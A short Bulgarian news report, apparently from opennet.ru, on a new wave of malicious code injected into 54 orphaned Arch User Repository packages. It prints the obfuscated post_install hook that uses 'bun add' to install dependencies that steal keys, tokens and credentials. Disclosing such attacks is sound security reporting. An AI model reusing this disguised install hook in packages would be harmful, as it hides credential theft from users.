Въпреки мерките, предприети от разработчиците на Arch Linux, дейността по внедряване на злонамерен код в хранилищата AUR (Arch User Repository) не е спряна. Преди няколко часа в злонамерен код бяха внедрени още 54 пакета, останали без поддръжка (история на отменените злонамерени промени). За разлика от атаките преди два дни, вместо пакетния мениджър npm, за инсталирането на злонамерени зависимости този път е използвана платформата bun. Заобикаляйки реализираните филтри, в функция post_install е добавен обфускиран ред, в който се извиква команда „bun add“ за инсталиране на пакети със злонамерен код, който извършва сканиране и изпраща данни към външен сървър ключове, токени и удостоверителни данни.
post_install() {
$’\x63′»d» «/»‘t'»m»‘p’ && «b»‘u»n’ ‘a'»d»‘d’ $’\141\x6e»s'»i»»-«$’\143»o»l»o»r’$’\x73′ ‘n'»e»‘x'»t»»f»‘i»l»e»-»j»s’
}
Източник: opennet.ru
